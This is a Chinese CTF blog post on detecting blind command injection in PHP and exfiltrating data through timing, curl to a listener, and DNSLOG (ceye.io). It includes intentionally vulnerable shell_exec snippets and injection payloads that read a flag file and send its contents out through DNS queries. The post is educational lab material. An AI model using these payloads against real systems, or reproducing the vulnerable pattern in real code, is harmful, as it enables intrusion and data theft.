User-Profile-Image
hankin
  • 5
请到[后台->外观->菜单]中设置菜单。
  • 分类
    • 靶机渗透
    • 计算机小技巧
    • 未分类
    • 数据结构
    • 内网渗透
    • 代码审计
    • XSS
    • WEB安全漏洞学习
    • Web
    • python
    • PHP
    • NodeJS
    • MYSQL
    • Misc
    • JavaScript
    • Docker
    • CTF相关知识点
    • CTFWP
    • Crypto
    • Cobalt Strike
  • 页面
  • 友链
    • 三哥的博客
    • Root师傅的博客
    • EDS师傅的博客
    • 天正哥的博客
    • 天尘翼师傅的博客
    • 熵增师傅的github
    • 信仰的博客
Help?

Please contact us on our email for need any support

Support
    首页   ›   CTF相关知识点   ›   正文
CTF相关知识点

命令执行无回显的判断方法及DNSLOG相关例题的讲解

2020-12-28 12:38:16
662  0 0

命令无回显的情况

判断方法

1.延时

2.HTTP请求

3.DNS请求

<?php
highlight_file(__FILE__);
shell_exec($_GET[1]);
?>

(1)通过传入1=ls|sleep(3)

页面加载3秒左右才显示来证明注入语句带入成功

传入1=ls|curl 192.168.12.104:8000前先在本机开启nc -lvp 8000

(2)通过提前nc监听,利用curl命令进行信息获取

(3)提前注册ceye.io平台获取一个域名,该域名下的子域名被请求的信息都会被记录到平台上

其中DNS请求的使用范围多于HTTP请求,常用利用方式

写shell(直接写入/外部下载)http/dns等方式带出数据

<?php
highlight_file(__FILE__);
include('where_is_flag.php');
echo "ping";
$ip = (string)$_GET['ping'];
$ip = str_replace(">","0.0",$ip);
shell_exec("ping ".$ip);
?>

ping的话不会发出HTTP请求,但会发出DNS请求,所以DNSLOG是可以用的(ceye.io)
第一种思路:
ping=1;cp where_is_flag.php 1.txt
访问1.txt得到flag
第二种思路
通过ceye.io外带数据获取
但是ping有个问题就是 ping后的数据不能有空格存在,例 ping baidu.com可以,但是ping bai du.com就不行
所以首先在ceye.io平台获取到一个域名,然后与去掉空格的where_is_flag.php内容及进行拼接

payload:ping=`cat where_is_flag.php|sed s/[[:space:]]//`.php.o9qxvv.ceye.io

不知道哪里有问题,与视频学习到的完全不符,ping 中数据带有特殊字符的话会报错,无法ping。这里积累一个方法吧

评论 (0)

点击这里取消回复。

欢迎您 游客  

近期文章
  • [安洵杯 2019]easy_serialize_php
  • Session反序列化
  • 原生类序列化
  • ThinkPHP框架审计案例(hsycms2.0)
  • ThinkPHP5.0.24框架认识
近期评论
  • CTFSHOW-反序列化专题 – purplet的博客发表在《SoapClient与CRLF组合拳》
文章归档
  • 2021年1月
  • 2020年12月
  • 2020年11月
  • 2020年9月
  • 2020年7月
  • 2020年6月
  • 2020年5月
  • 2020年4月
  • 2020年3月
  • 2020年2月
  • 2020年1月
分类目录
  • Cobalt Strike
  • Crypto
  • CTFWP
  • CTF相关知识点
  • Docker
  • JavaScript
  • Misc
  • MYSQL
  • NodeJS
  • PHP
  • python
  • Web
  • WEB安全漏洞学习
  • XSS
  • 代码审计
  • 内网渗透
  • 数据结构
  • 未分类
  • 计算机小技巧
  • 靶机渗透
功能
  • 登录
  • 项目feed
  • 评论feed
  • WordPress.org
分类目录
Copyright © 2021 网站备案号: 蒙ICP备20000552号-1
smarty_hankin 主题. Designed by hankin
主页
页面
博主
purplet 管理员
努力并有所方向
155 文章 2 评论 18607 浏览
测试
测试